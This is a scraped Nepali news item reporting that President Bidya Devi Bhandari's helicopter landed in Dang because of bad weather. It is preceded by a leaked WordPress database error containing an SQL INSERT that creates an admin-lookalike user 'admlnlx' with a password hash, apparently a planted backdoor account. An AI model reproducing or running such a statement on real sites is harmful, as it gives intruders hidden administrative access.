WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAURwHX7OWKQCoWVSg8/3FPA7bKLna1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:37:20', '', 'admlnlx', 'admlnlx')
काठमाडौँ।, माघ १४ –
कैलालीको धनगढीमा हुने कार्यक्रमका लागि काठमाडौँबाट त्यसतर्फ प्रस्थान गरेको राष्ट्रपति विद्यादेवी भण्डारी सवार नेपाली सेनाको हेलिकप्टर प्रतिकूल मौसमका कारण दाङको भालुवाङमा अवतरण भएको छ ।
राष्ट्रपति भण्डारी अहिले दाङको भालुवाङस्थित सशस्त्र प्रहरी क्याम्पमा प्रतीक्षारत हुनुहुन्छ ।
मौसम अनुकूल भएलगत्तै उहाँ धनगढी प्रस्थान गर्नुहुने राष्ट्रपति कार्यालयका सूचना अधिकारी प्रह्लादप्रसाद पुडासैनीले जानकारी दिनुभयो ।- रासस